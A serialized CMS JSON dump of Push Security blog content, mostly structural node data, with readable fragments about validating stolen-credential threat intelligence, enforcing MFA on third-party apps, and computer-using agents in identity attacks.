"data":153967,"marks":153968,"value":126186,"nodeType":173},{},[],{"data":153970,"content":153973,"nodeType":312},{"target":153971},{"sys":153972},{"id":105035,"type":317,"linkType":318},[],{"data":153975,"content":153978,"nodeType":312},{"target":153976},{"sys":153977},{"id":126196,"type":317,"linkType":318},[],{"data":153980,"content":153981,"nodeType":231},{},[],{"data":153983,"content":153984,"nodeType":169},{},[153985],{"data":153986,"marks":153987,"value":126207,"nodeType":173},{},[],{"data":153989,"content":153990,"nodeType":235},{},[153991],{"data":153992,"marks":153993,"value":77025,"nodeType":173},{},[153994],{"type":370},{"data":153996,"content":153997,"nodeType":178},{},[153998],{"data":153999,"marks":154000,"value":126221,"nodeType":173},{},[],{"data":154002,"content":154003,"nodeType":178},{},[154004,154007,154014],{"data":154005,"marks":154006,"value":126228,"nodeType":173},{},[],{"data":154008,"content":154009,"nodeType":186},{"uri":71244},[154010],{"data":154011,"marks":154012,"value":126236,"nodeType":173},{},[154013],{"type":194},{"data":154015,"marks":154016,"value":126240,"nodeType":173},{},[],{"data":154018,"content":154019,"nodeType":3769},{},[154020],{"data":154021,"content":154022,"nodeType":178},{},[154023],{"data":154024,"marks":154025,"value":126250,"nodeType":173},{},[],{"data":154027,"content":154028,"nodeType":178},{},[154029,154032,154039],{"data":154030,"marks":154031,"value":126257,"nodeType":173},{},[],{"data":154033,"content":154034,"nodeType":186},{"uri":126102},[154035],{"data":154036,"marks":154037,"value":126265,"nodeType":173},{},[154038],{"type":194},{"data":154040,"marks":154041,"value":126269,"nodeType":173},{},[],{"data":154043,"content":154044,"nodeType":178},{},[154045],{"data":154046,"marks":154047,"value":126276,"nodeType":173},{},[],{"data":154049,"content":154050,"nodeType":178},{},[154051],{"data":154052,"marks":154053,"value":126283,"nodeType":173},{},[],{"data":154055,"content":154056,"nodeType":3769},{},[154057],{"data":154058,"content":154059,"nodeType":178},{},[154060],{"data":154061,"marks":154062,"value":126293,"nodeType":173},{},[],{"data":154064,"content":154065,"nodeType":235},{},[154066],{"data":154067,"marks":154068,"value":24287,"nodeType":173},{},[154069],{"type":370},{"data":154071,"content":154072,"nodeType":178},{},[154073],{"data":154074,"marks":154075,"value":126307,"nodeType":173},{},[],{"data":154077,"content":154078,"nodeType":178},{},[154079,154082,154090],{"data":154080,"marks":154081,"value":126314,"nodeType":173},{},[],{"data":154083,"content":154084,"nodeType":186},{"uri":62639},[154085],{"data":154086,"marks":154087,"value":126323,"nodeType":173},{},[154088,154089],{"type":194},{"type":370},{"data":154091,"marks":154092,"value":126327,"nodeType":173},{},[],{"data":154094,"content":154097,"nodeType":312},{"target":154095},{"sys":154096},{"id":126332,"type":317,"linkType":318},[],{"data":154099,"content":154100,"nodeType":231},{},[],{"data":154102,"content":154103,"nodeType":169},{},[154104],{"data":154105,"marks":154106,"value":126343,"nodeType":173},{},[],{"data":154108,"content":154109,"nodeType":178},{},[154110],{"data":154111,"marks":154112,"value":126350,"nodeType":173},{},[],{"data":154114,"content":154115,"nodeType":178},{},[154116],{"data":154117,"marks":154118,"value":126357,"nodeType":173},{},[],{"data":154120,"content":154121,"nodeType":250},{},[154122,154138,154154],{"data":154123,"content":154124,"nodeType":254},{},[154125],{"data":154126,"content":154127,"nodeType":178},{},[154128,154131,154135],{"data":154129,"marks":154130,"value":126370,"nodeType":173},{},[],{"data":154132,"marks":154133,"value":126375,"nodeType":173},{},[154134],{"type":370},{"data":154136,"marks":154137,"value":126379,"nodeType":173},{},[],{"data":154139,"content":154140,"nodeType":254},{},[154141],{"data":154142,"content":154143,"nodeType":178},{},[154144,154147,154151],{"data":154145,"marks":154146,"value":126389,"nodeType":173},{},[],{"data":154148,"marks":154149,"value":126394,"nodeType":173},{},[154150],{"type":370},{"data":154152,"marks":154153,"value":126398,"nodeType":173},{},[],{"data":154155,"content":154156,"nodeType":254},{},[154157],{"data":154158,"content":154159,"nodeType":178},{},[154160,154163,154167,154170,154177],{"data":154161,"marks":154162,"value":126408,"nodeType":173},{},[],{"data":154164,"marks":154165,"value":126413,"nodeType":173},{},[154166],{"type":370},{"data":154168,"marks":154169,"value":126417,"nodeType":173},{},[],{"data":154171,"content":154172,"nodeType":186},{"uri":4342},[154173],{"data":154174,"marks":154175,"value":835,"nodeType":173},{},[154176],{"type":194},{"data":154178,"marks":154179,"value":126428,"nodeType":173},{},[],{"data":154181,"content":154182,"nodeType":178},{},[154183],{"data":154184,"marks":154185,"value":126435,"nodeType":173},{},[],{"data":154187,"content":154188,"nodeType":178},{},[154189],{"data":154190,"marks":154191,"value":126442,"nodeType":173},{},[],{"data":154193,"content":154194,"nodeType":178},{},[154195],{"data":154196,"marks":154197,"value":126449,"nodeType":173},{},[],{"data":154199,"content":154200,"nodeType":235},{},[154201],{"data":154202,"marks":154203,"value":126457,"nodeType":173},{},[154204],{"type":370},{"data":154206,"content":154207,"nodeType":178},{},[154208,154211,154219],{"data":154209,"marks":154210,"value":126464,"nodeType":173},{},[],{"data":154212,"content":154213,"nodeType":186},{"uri":126467},[154214],{"data":154215,"marks":154216,"value":126474,"nodeType":173},{},[154217,154218],{"type":194},{"type":370},{"data":154220,"marks":154221,"value":126478,"nodeType":173},{},[],{"data":154223,"content":154224,"nodeType":178},{},[154225],{"data":154226,"marks":154227,"value":126485,"nodeType":173},{},[],{"data":154229,"content":154232,"nodeType":312},{"target":154230},{"sys":154231},{"id":126490,"type":317,"linkType":318},[],{"data":154234,"content":154235,"nodeType":235},{},[154236,154240],{"data":154237,"marks":154238,"value":126499,"nodeType":173},{},[154239],{"type":370},{"data":154241,"marks":154242,"value":3107,"nodeType":173},{},[],{"data":154244,"content":154245,"nodeType":178},{},[154246,154249,154257],{"data":154247,"marks":154248,"value":126509,"nodeType":173},{},[],{"data":154250,"content":154251,"nodeType":186},{"uri":126512},[154252],{"data":154253,"marks":154254,"value":126519,"nodeType":173},{},[154255,154256],{"type":194},{"type":370},{"data":154258,"marks":154259,"value":126523,"nodeType":173},{},[],{"data":154261,"content":154262,"nodeType":178},{},[154263],{"data":154264,"marks":154265,"value":126530,"nodeType":173},{},[],{"data":154267,"content":154268,"nodeType":235},{},[154269],{"data":154270,"marks":154271,"value":126538,"nodeType":173},{},[154272],{"type":370},{"data":154274,"content":154275,"nodeType":178},{},[154276,154279,154287],{"data":154277,"marks":154278,"value":126545,"nodeType":173},{},[],{"data":154280,"content":154281,"nodeType":186},{"uri":77513},[154282],{"data":154283,"marks":154284,"value":2570,"nodeType":173},{},[154285,154286],{"type":194},{"type":370},{"data":154288,"marks":154289,"value":126557,"nodeType":173},{},[],{"data":154291,"content":154292,"nodeType":178},{},[154293],{"data":154294,"marks":154295,"value":126564,"nodeType":173},{},[],{"data":154297,"content":154298,"nodeType":178},{},[154299],{"data":154300,"marks":154301,"value":126571,"nodeType":173},{},[],{"data":154303,"content":154306,"nodeType":312},{"target":154304},{"sys":154305},{"id":126576,"type":317,"linkType":318},[],{"data":154308,"content":154309,"nodeType":231},{},[],{"data":154311,"content":154312,"nodeType":169},{},[154313],{"data":154314,"marks":154315,"value":126587,"nodeType":173},{},[],{"data":154317,"content":154318,"nodeType":178},{},[154319,154322,154328],{"data":154320,"marks":154321,"value":126594,"nodeType":173},{},[],{"data":154323,"content":154324,"nodeType":186},{"uri":473},[154325],{"data":154326,"marks":154327,"value":126601,"nodeType":173},{},[],{"data":154329,"marks":154330,"value":126605,"nodeType":173},{},[],{"items":154332},[154333,154335],{"sys":154334,"name":509},{"id":508},{"sys":154336,"name":26137},{"id":26136},{"items":154338},[154339],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":154340},{"url":2911},{"items":154342},[154343],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":154344},{"url":13981},{"json":154346,"links":154881},{"nodeType":165,"data":154347,"content":154348},{},[154349,154355,154368,154374,154379,154385,154391,154394,154400,154406,154412,154432,154438,154451,154454,154460,154466,154487,154493,154499,154515,154520,154526,154542,154547,154553,154593,154600,154606,154616,154626,154632,154658,154664,154667,154673,154689,154695,154701,154707,154710,154716,154723,154729,154735,154795,154801,154807,154813,154843,154849,154855,154861,154866],{"nodeType":178,"data":154350,"content":154351},{},[154352],{"nodeType":173,"value":143699,"marks":154353,"data":154354},[],{},{"nodeType":178,"data":154356,"content":154357},{},[154358,154361,154365],{"nodeType":173,"value":143706,"marks":154359,"data":154360},[],{},{"nodeType":173,"value":143710,"marks":154362,"data":154364},[154363],{"type":370},{},{"nodeType":173,"value":143715,"marks":154366,"data":154367},[],{},{"nodeType":178,"data":154369,"content":154370},{},[154371],{"nodeType":173,"value":143722,"marks":154372,"data":154373},[],{},{"nodeType":312,"data":154375,"content":154378},{"target":154376},{"sys":154377},{"id":143729,"type":317,"linkType":318},[],{"nodeType":178,"data":154380,"content":154381},{},[154382],{"nodeType":173,"value":143735,"marks":154383,"data":154384},[],{},{"nodeType":178,"data":154386,"content":154387},{},[154388],{"nodeType":173,"value":143742,"marks":154389,"data":154390},[],{},{"nodeType":231,"data":154392,"content":154393},{},[],{"nodeType":169,"data":154395,"content":154396},{},[154397],{"nodeType":173,"value":143752,"marks":154398,"data":154399},[],{},{"nodeType":178,"data":154401,"content":154402},{},[154403],{"nodeType":173,"value":143759,"marks":154404,"data":154405},[],{},{"nodeType":178,"data":154407,"content":154408},{},[154409],{"nodeType":173,"value":143766,"marks":154410,"data":154411},[],{},{"nodeType":178,"data":154413,"content":154414},{},[154415,154418,154422,154425,154429],{"nodeType":173,"value":143773,"marks":154416,"data":154417},[],{},{"nodeType":173,"value":143777,"marks":154419,"data":154421},[154420],{"type":370},{},{"nodeType":173,"value":3107,"marks":154423,"data":154424},[],{},{"nodeType":173,"value":143785,"marks":154426,"data":154428},[154427],{"type":370},{},{"nodeType":173,"value":10557,"marks":154430,"data":154431},[],{},{"nodeType":178,"data":154433,"content":154434},{},[154435],{"nodeType":173,"value":143796,"marks":154436,"data":154437},[],{},{"nodeType":178,"data":154439,"content":154440},{},[154441,154444,154448],{"nodeType":173,"value":143803,"marks":154442,"data":154443},[],{},{"nodeType":173,"value":143807,"marks":154445,"data":154447},[154446],{"type":370},{},{"nodeType":173,"value":143812,"marks":154449,"data":154450},[],{},{"nodeType":231,"data":154452,"content":154453},{},[],{"nodeType":169,"data":154455,"content":154456},{},[154457],{"nodeType":173,"value":143822,"marks":154458,"data":154459},[],{},{"nodeType":178,"data":154461,"content":154462},{},[154463],{"nodeType":173,"value":143829,"marks":154464,"data":154465},[],{},{"nodeType":250,"data":154467,"content":154468},{},[154469,154478],{"nodeType":254,"data":154470,"content":154471},{},[154472],{"nodeType":178,"data":154473,"content":154474},{},[154475],{"nodeType":173,"value":143842,"marks":154476,"data":154477},[],{},{"nodeType":254,"data":154479,"content":154480},{},[154481],{"nodeType":178,"data":154482,"content":154483},{},[154484],{"nodeType":173,"value":143852,"marks":154485,"data":154486},[],{},{"nodeType":178,"data":154488,"content":154489},{},[154490],{"nodeType":173,"value":143859,"marks":154491,"data":154492},[],{},{"nodeType":235,"data":154494,"content":154495},{},[154496],{"nodeType":173,"value":143866,"marks":154497,"data":154498},[],{},{"nodeType":178,"data":154500,"content":154501},{},[154502,154505,154512],{"nodeType":173,"value":143873,"marks":154503,"data":154504},[],{},{"nodeType":186,"data":154506,"content":154507},{"uri":4492},[154508],{"nodeType":173,"value":143880,"marks":154509,"data":154511},[154510],{"type":194},{},{"nodeType":173,"value":197,"marks":154513,"data":154514},[],{},{"nodeType":312,"data":154516,"content":154519},{"target":154517},{"sys":154518},{"id":143891,"type":317,"linkType":318},[],{"nodeType":178,"data":154521,"content":154522},{},[154523],{"nodeType":173,"value":143897,"marks":154524,"data":154525},[],{},{"nodeType":178,"data":154527,"content":154528},{},[154529,154532,154539],{"nodeType":173,"value":143904,"marks":154530,"data":154531},[],{},{"nodeType":186,"data":154533,"content":154534},{"uri":819},[154535],{"nodeType":173,"value":143911,"marks":154536,"data":154538},[154537],{"type":194},{},{"nodeType":173,"value":143916,"marks":154540,"data":154541},[],{},{"nodeType":312,"data":154543,"content":154546},{"target":154544},{"sys":154545},{"id":143923,"type":317,"linkType":318},[],{"nodeType":178,"data":154548,"content":154549},{},[154550],{"nodeType":173,"value":143929,"marks":154551,"data":154552},[],{},{"nodeType":250,"data":154554,"content":154555},{},[154556,154565,154574],{"nodeType":254,"data":154557,"content":154558},{},[154559],{"nodeType":178,"data":154560,"content":154561},{},[154562],{"nodeType":173,"value":143942,"marks":154563,"data":154564},[],{},{"nodeType":254,"data":154566,"content":154567},{},[154568],{"nodeType":178,"data":154569,"content":154570},{},[154571],{"nodeType":173,"value":143952,"marks":154572,"data":154573},[],{},{"nodeType":254,"data":154575,"content":154576},{},[154577],{"nodeType":178,"data":154578,"content":154579},{},[154580,154583,154590],{"nodeType":173,"value":143962,"marks":154581,"data":154582},[],{},{"nodeType":186,"data":154584,"content":154585},{"uri":143967},[154586],{"nodeType":173,"value":143970,"marks":154587,"data":154589},[154588],{"type":194},{},{"nodeType":173,"value":143975,"marks":154591,"data":154592},[],{},{"nodeType":178,"data":154594,"content":154595},{},[154596],{"nodeType":173,"value":143982,"marks":154597,"data":154599},[154598],{"type":370},{},{"nodeType":178,"data":154601,"content":154602},{},[154603],{"nodeType":173,"value":143990,"marks":154604,"data":154605},[],{},{"nodeType":178,"data":154607,"content":154608},{},[154609,154613],{"nodeType":173,"value":143997,"marks":154610,"data":154612},[154611],{"type":370},{},{"nodeType":173,"value":144002,"marks":154614,"data":154615},[],{},{"nodeType":178,"data":154617,"content":154618},{},[154619,154623],{"nodeType":173,"value":144009,"marks":154620,"data":154622},[154621],{"type":370},{},{"nodeType":173,"value":144014,"marks":154624,"data":154625},[],{},{"nodeType":235,"data":154627,"content":154628},{},[154629],{"nodeType":173,"value":144021,"marks":154630,"data":154631},[],{},{"nodeType":178,"data":154633,"content":154634},{},[154635,154638,154645,154648,154655],{"nodeType":173,"value":144028,"marks":154636,"data":154637},[],{},{"nodeType":186,"data":154639,"content":154640},{"uri":144033},[154641],{"nodeType":173,"value":144036,"marks":154642,"data":154644},[154643],{"type":194},{},{"nodeType":173,"value":144041,"marks":154646,"data":154647},[],{},{"nodeType":186,"data":154649,"content":154650},{"uri":144046},[154651],{"nodeType":173,"value":144049,"marks":154652,"data":154654},[154653],{"type":194},{},{"nodeType":173,"value":144054,"marks":154656,"data":154657},[],{},{"nodeType":178,"data":154659,"content":154660},{},[154661],{"nodeType":173,"value":144061,"marks":154662,"data":154663},[],{},{"nodeType":231,"data":154665,"content":154666},{},[],{"nodeType":169,"data":154668,"content":154669},{},[154670],{"nodeType":173,"value":144071,"marks":154671,"data":154672},[],{},{"nodeType":178,"data":154674,"content":154675},{},[154676,154679,154686],{"nodeType":173,"value":144078,"marks":154677,"data":154678},[],{},{"nodeType":186,"data":154680,"content":154681},{"uri":144083},[154682],{"nodeType":173,"value":144086,"marks":154683,"data":154685},[154684],{"type":194},{},{"nodeType":173,"value":144091,"marks":154687,"data":154688},[],{},{"nodeType":178,"data":154690,"content":154691},{},[154692],{"nodeType":173,"value":144098,"marks":154693,"data":154694},[],{},{"nodeType":178,"data":154696,"content":154697},{},[154698],{"nodeType":173,"value":144105,"marks":154699,"data":154700},[],{},{"nodeType":178,"data":154702,"content":154703},{},[154704],{"nodeType":173,"value":144112,"marks":154705,"data":154706},[],{},{"nodeType":231,"data":154708,"content":154709},{},[],{"nodeType":169,"data":154711,"content":154712},{},[154713],{"nodeType":173,"value":144122,"marks":154714,"data":154715},[],{},{"nodeType":178,"data":154717,"content":154718},{},[154719],{"nodeType":173,"value":144129,"marks":154720,"data":154722},[154721],{"type":370},{},{"nodeType":178,"data":154724,"content":154725},{},[154726],{"nodeType":173,"value":144137,"marks":154727,"data":154728},[],{},{"nodeType":178,"data":154730,"content":154731},{},[154732],{"nodeType":173,"value":144144,"marks":154733,"data":154734},[],{},{"nodeType":250,"data":154736,"content":154737},{},[154738,154757,154776],{"nodeType":254,"data":154739,"content":154740},{},[154741],{"nodeType":178,"data":154742,"content":154743},{},[154744,154747,154754],{"nodeType":173,"value":37,"marks":154745,"data":154746},[],{},{"nodeType":186,"data":154748,"content":154749},{"uri":144161},[154750],{"nodeType":173,"value":144161,"marks":154751,"data":154753},[154752],{"type":194},{},{"nodeType":173,"value":10557,"marks":154755,"data":154756},[],{},{"nodeType":254,"data":154758,"content":154759},{},[154760],{"nodeType":178,"data":154761,"content":154762},{},[154763,154766,154773],{"nodeType":173,"value":37,"marks":154764,"data":154765},[],{},{"nodeType":186,"data":154767,"content":154768},{"uri":144181},[154769],{"nodeType":173,"value":144181,"marks":154770,"data":154772},[154771],{"type":194},{},{"nodeType":173,"value":37,"marks":154774,"data":154775},[],{},{"nodeType":254,"data":154777,"content":154778},{},[154779],{"nodeType":178,"data":154780,"content":154781},{},[154782,154785,154792],{"nodeType":173,"value":37,"marks":154783,"data":154784},[],{},{"nodeType":186,"data":154786,"content":154787},{"uri":144201},[154788],{"nodeType":173,"value":144201,"marks":154789,"data":154791},[154790],{"type":194},{},{"nodeType":173,"value":1477,"marks":154793,"data":154794},[],{},{"nodeType":178,"data":154796,"content":154797},{},[154798],{"nodeType":173,"value":144214,"marks":154799,"data":154800},[],{},{"nodeType":235,"data":154802,"content":154803},{},[154804],{"nodeType":173,"value":144221,"marks":154805,"data":154806},[],{},{"nodeType":178,"data":154808,"content":154809},{},[154810],{"nodeType":173,"value":144228,"marks":154811,"data":154812},[],{},{"nodeType":250,"data":154814,"content":154815},{},[154816,154825,154834],{"nodeType":254,"data":154817,"content":154818},{},[154819],{"nodeType":178,"data":154820,"content":154821},{},[154822],{"nodeType":173,"value":144241,"marks":154823,"data":154824},[],{},{"nodeType":254,"data":154826,"content":154827},{},[154828],{"nodeType":178,"data":154829,"content":154830},{},[154831],{"nodeType":173,"value":144251,"marks":154832,"data":154833},[],{},{"nodeType":254,"data":154835,"content":154836},{},[154837],{"nodeType":178,"data":154838,"content":154839},{},[154840],{"nodeType":173,"value":144261,"marks":154841,"data":154842},[],{},{"nodeType":235,"data":154844,"content":154845},{},[154846],{"nodeType":173,"value":1422,"marks":154847,"data":154848},[],{},{"nodeType":178,"data":154850,"content":154851},{},[154852],{"nodeType":173,"value":144274,"marks":154853,"data":154854},[],{},{"nodeType":178,"data":154856,"content":154857},{},[154858],{"nodeType":173,"value":144281,"marks":154859,"data":154860},[],{},{"nodeType":312,"data":154862,"content":154865},{"target":154863},{"sys":154864},{"id":144288,"type":317,"linkType":318},[],{"nodeType":178,"data":154867,"content":154868},{},[154869,154872,154878],{"nodeType":173,"value":144294,"marks":154870,"data":154871},[],{},{"nodeType":186,"data":154873,"content":154874},{"uri":473},[154875],{"nodeType":173,"value":126601,"marks":154876,"data":154877},[],{},{"nodeType":173,"value":126605,"marks":154879,"data":154880},[],{},{"entries":154882},{"hyperlink":154883,"inline":154884,"block":154885},[],[],[154886,154891,154895,154909],{"sys":154887,"__typename":5345,"title":154888,"caption":154888,"layoutMode":118,"file":154889},{"id":143729},"OpenAI Operator being tasked with “find and book me the highest rated one-day tour of Rome on Tripadvisor”",{"url":154890,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/5iIuabafJE9Ppd3MBVPQr1/c28b519b0ea62b926a0ef17c404fc550/image1.png",{"sys":154892,"__typename":15269,"type":15270,"ctaText":154893,"buttonLabel":154894,"buttonColour":72847,"buttonUrl":71244},{"id":143891},"Read about how identity-based techniques were used by attackers in 2024s biggest cyber breaches","Read Blog",{"sys":154896,"__typename":5311,"content":154897,"name":154908,"title":118},{"id":143923},{"json":154898},{"nodeType":165,"data":154899,"content":154900},{},[154901],{"nodeType":178,"data":154902,"content":154903},{},[154904],{"nodeType":173,"value":154905,"marks":154906,"data":154907},"The Snowflake attacks saw credentials from infostealer infections dating back to 2020 used to breach ~165 customer tenants, resulting in hundreds of millions of breached customer records — arguably the biggest cyber breach of the year. But the impact could have been significantly worse than this if the attackers had access to a CUA. ",[],{},"The Snowflake attacks saw credentials from infostealer infections dating back to 2020 used against ~165 customer tenants. But the impact could have been significantly worse than this if the attackers had access to a CUA. ",{"sys":154910,"__typename":127689,"title":154911,"youTubeUrl":154912,"imagePlaceholder":154913},{"id":144288},"5 ways Computer-Using Agents can automate identity attacks","https://www.youtube.com/watch?v=BuefsnMMyrM",{"url":154914,"width":121106,"height":49163},"https://images.ctfassets.net/y1cdw1ablpvd/7kFAZLy7gbAMifHkkKpfo/add59eb5173ee6b0910d86d5406bb946/Slide_16_9_-_104__1_.png","content:blog:considering-the-impact-of-computer-using-agents.json","blog/considering-the-impact-of-computer-using-agents.json","blog/considering-the-impact-of-computer-using-agents",{"_path":154919,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":154920,"ogImage":118,"summary":154922,"title":46318,"subtitle":118,"metaTitle":154933,"synopsis":71822,"hashTags":118,"publishedDate":71823,"slug":46319,"tagsCollection":154934,"relatedBlogPostsCollection":154940,"authorsCollection":157492,"content":157496,"_id":158172,"_type":5439,"_source":5440,"_file":158173,"_stem":158174,"_extension":5439},"/blog/enforce-mfa-on-third-party-apps",{"id":24787,"publishedAt":154921},"2026-01-30T09:12:32.395Z",{"json":154923},{"data":154924,"content":154925,"nodeType":165},{},[154926],{"data":154927,"content":154928,"nodeType":178},{},[154929],{"data":154930,"marks":154931,"value":154932,"nodeType":173},{},[],"With our latest feature release, MFA enforcement, Push administrators can configure a control to prompt employees to enroll in MFA whenever Push detects that they’re not registered — even on apps that don’t natively provide any administrative enforcement option for MFA. ","Using Push to enforce MFA on third-party apps in the browser",{"items":154935},[154936,154938],{"sys":154937,"name":26137},{"id":26136},{"sys":154939,"name":509},{"id":508},{"items":154941},[154942,155649,155986],{"__typename":1528,"sys":154943,"content":154944,"title":46310,"synopsis":155637,"hashTags":118,"publishedDate":155638,"slug":46311,"tagsCollection":155639,"authorsCollection":155645},{"id":24713},{"json":154945},{"nodeType":165,"data":154946,"content":154947},{},[154948,154954,154957,154973,154980,154987,154993,155000,155018,155037,155044,155050,155057,155060,155067,155074,155081,155088,155095,155102,155135,155141,155148,155151,155158,155165,155280,155287,155305,155312,155330,155337,155357,155364,155382,155385,155392,155399,155406,155438,155445,155452,155470,155476,155483,155490,155496,155502,155564,155571,155578,155585,155592,155599,155602,155609,155626,155631],{"nodeType":312,"data":154949,"content":154953},{"target":154950},{"sys":154951},{"id":154952,"type":317,"linkType":318},"HcoxuG8EK0w5uFQlN0hbh",[],{"nodeType":231,"data":154955,"content":154956},{},[],{"nodeType":178,"data":154958,"content":154959},{},[154960,154964,154969],{"nodeType":173,"value":154961,"marks":154962,"data":154963},"While ",[],{},{"nodeType":173,"value":154965,"marks":154966,"data":154968},"striking",[154967],{"type":1646},{},{"nodeType":173,"value":154970,"marks":154971,"data":154972}," gold sure feels good, mining for gold doesn’t. All that sifting for a few grains of value. ",[],{},{"nodeType":178,"data":154974,"content":154975},{},[154976],{"nodeType":173,"value":154977,"marks":154978,"data":154979},"If you’ve ever tried to make use of a TI feed on stolen credentials, you’ll know exactly how this feels. Yet the need to identify signal from noise is obvious. When it matters, it really matters. ",[],{},{"nodeType":178,"data":154981,"content":154982},{},[154983],{"nodeType":173,"value":154984,"marks":154985,"data":154986},"While there’s an enormous volume of TI data available on stolen creds, data trustworthiness is much harder to establish. Are these creds still in use? Are they in use on company applications? And without trust in the data, it’s harder to take action.",[],{},{"nodeType":312,"data":154988,"content":154992},{"target":154989},{"sys":154990},{"id":154991,"type":317,"linkType":318},"4unFZadFrWEQsiHsD3YAEo",[],{"nodeType":178,"data":154994,"content":154995},{},[154996],{"nodeType":173,"value":154997,"marks":154998,"data":154999},"We set out to solve this problem at Push and ended up flipping the script on conventional approaches to evaluating TI on stolen credentials. (Lay down your shovel, friend.)",[],{},{"nodeType":3769,"data":155001,"content":155002},{},[155003],{"nodeType":178,"data":155004,"content":155005},{},[155006,155010,155015],{"nodeType":173,"value":155007,"marks":155008,"data":155009},"With our latest release, Push takes TI on stolen credentials sourced from criminal forums and compares it to the actual credentials still being used across customer environments, ",[],{},{"nodeType":173,"value":155011,"marks":155012,"data":155014},"alerting on validated true positives only",[155013],{"type":370},{},{"nodeType":173,"value":2340,"marks":155016,"data":155017},[],{},{"nodeType":178,"data":155019,"content":155020},{},[155021,155025,155033],{"nodeType":173,"value":155022,"marks":155023,"data":155024},"As of January 2025, you can also bring your own TI to the Push platform. Using the ",[],{},{"nodeType":186,"data":155026,"content":155028},{"uri":155027},"https://pushsecurity.redoc.ly/rest-v1#tag/Stolen-credential-detection",[155029],{"nodeType":173,"value":155030,"marks":155031,"data":155032},"Push REST API",[],{},{"nodeType":173,"value":155034,"marks":155035,"data":155036},", you can share stolen credential reports you receive from your existing vendors and task the Push browser agent with finding the ones still in use by employees.",[],{},{"nodeType":178,"data":155038,"content":155039},{},[155040],{"nodeType":173,"value":155041,"marks":155042,"data":155043},"Call it the “dirt in, gold out” model for TI feeds.",[],{},{"nodeType":312,"data":155045,"content":155049},{"target":155046},{"sys":155047},{"id":155048,"type":317,"linkType":318},"5VtuerdMpP4U9yL7pjrb4P",[],{"nodeType":178,"data":155051,"content":155052},{},[155053],{"nodeType":173,"value":155054,"marks":155055,"data":155056},"In this article, we’ll cover some of the challenges with threat intel on stolen credentials, why the rise of infostealers has added urgency to determining the trustworthiness of this category of threat, and how Push’s approach of validating stolen credentials cuts through uncertainty. ",[],{},{"nodeType":231,"data":155058,"content":155059},{},[],{"nodeType":169,"data":155061,"content":155062},{},[155063],{"nodeType":173,"value":155064,"marks":155065,"data":155066},"Why actionable intel on creds is hard",[],{},{"nodeType":178,"data":155068,"content":155069},{},[155070],{"nodeType":173,"value":155071,"marks":155072,"data":155073},"Both threat actors and security teams have ready access to information on stolen credentials, with obviously opposite goals. There is now a robust economy for this data, driven in part by both the success of attacks using stolen creds, and the SaaS-ification of business software. In the past, security teams could audit their Active Directory passwords. Today, many if not most corporate credentials are stored in apps that do not provide that level of visibility.",[],{},{"nodeType":178,"data":155075,"content":155076},{},[155077],{"nodeType":173,"value":155078,"marks":155079,"data":155080},"So when it comes to stolen credential TI, the challenge is not the availability of data — dozens of vendors already do the hard work of establishing presences in these forums in order to collect and disseminate information on credentials such as usernames, passwords, cookies, and API keys that have been stolen through data breaches, phishing attacks, infostealers, or other methods. ",[],{},{"nodeType":235,"data":155082,"content":155083},{},[155084],{"nodeType":173,"value":155085,"marks":155086,"data":155087},"Too much data, not enough context",[],{},{"nodeType":178,"data":155089,"content":155090},{},[155091],{"nodeType":173,"value":155092,"marks":155093,"data":155094},"Rather, the difficulty is determining which information to act on. Finding the gold, in other words.",[],{},{"nodeType":178,"data":155096,"content":155097},{},[155098],{"nodeType":173,"value":155099,"marks":155100,"data":155101},"TI on stolen credentials often suffers from:",[],{},{"nodeType":250,"data":155103,"content":155104},{},[155105,155120],{"nodeType":254,"data":155106,"content":155107},{},[155108],{"nodeType":178,"data":155109,"content":155110},{},[155111,155116],{"nodeType":173,"value":155112,"marks":155113,"data":155115},"Data overload:",[155114],{"type":370},{},{"nodeType":173,"value":155117,"marks":155118,"data":155119}," The double bind of TI is especially evident here — once you know about a potential true positive, you feel obligated to investigate, yet the scale of the information and the high incidence of outdated or incomplete information can pose a risk of desensitizing the SOC or wasting dozens of hours of time investigating what turn out to be false positives, especially when that time could have been better spent on in-depth threat hunting.",[],{},{"nodeType":254,"data":155121,"content":155122},{},[155123],{"nodeType":178,"data":155124,"content":155125},{},[155126,155131],{"nodeType":173,"value":155127,"marks":155128,"data":155130},"Minimal context:",[155129],{"type":370},{},{"nodeType":173,"value":155132,"marks":155133,"data":155134}," Intelligence is often incomplete or out of date. TI feeds may present stolen passwords as new breaches, but the data is actually a recycled combolist (aggregated list of lists) rather than a new incident. In some situations, infostealer threat intel can stem from a personal device that was compromised and once accessed corporate assets, but is no longer active or using that password. Then there are the false negatives, where you get an alert for stolen credentials on a core app following a breach, and the creds are no longer in use there — but they are still being used on a different high-value app. ",[],{},{"nodeType":312,"data":155136,"content":155140},{"target":155137},{"sys":155138},{"id":155139,"type":317,"linkType":318},"40ZWbzJFQLRjCAaFCA0YLS",[],{"nodeType":178,"data":155142,"content":155143},{},[155144],{"nodeType":173,"value":155145,"marks":155146,"data":155147},"Despite these challenges, there is still a strong case for incorporating TI on stolen creds into your cyber defense practice for one important reason: Attackers are increasingly using stolen credentials to compromise organizations.",[],{},{"nodeType":231,"data":155149,"content":155150},{},[],{"nodeType":169,"data":155152,"content":155153},{},[155154],{"nodeType":173,"value":155155,"marks":155156,"data":155157},"The commodification of stolen creds in the age of infostealers",[],{},{"nodeType":178,"data":155159,"content":155160},{},[155161],{"nodeType":173,"value":155162,"marks":155163,"data":155164},"A few headline stats on how ubiquitous stolen credential exploitation has become:",[],{},{"nodeType":250,"data":155166,"content":155167},{},[155168,155189,155211,155234,155270],{"nodeType":254,"data":155169,"content":155170},{},[155171],{"nodeType":178,"data":155172,"content":155173},{},[155174,155177,155185],{"nodeType":173,"value":5039,"marks":155175,"data":155176},[],{},{"nodeType":186,"data":155178,"content":155179},{"uri":125982},[155180],{"nodeType":173,"value":155181,"marks":155182,"data":155184},"2024 Verizon DBIR",[155183],{"type":194},{},{"nodeType":173,"value":155186,"marks":155187,"data":155188}," found that 79% of web application compromises were the result of breached credentials.",[],{},{"nodeType":254,"data":155190,"content":155191},{},[155192],{"nodeType":178,"data":155193,"content":155194},{},[155195,155198,155207],{"nodeType":173,"value":37,"marks":155196,"data":155197},[],{},{"nodeType":186,"data":155199,"content":155201},{"uri":155200},"https://www.ibm.com/reports/threat-intelligence",[155202],{"nodeType":173,"value":155203,"marks":155204,"data":155206},"Researchers at 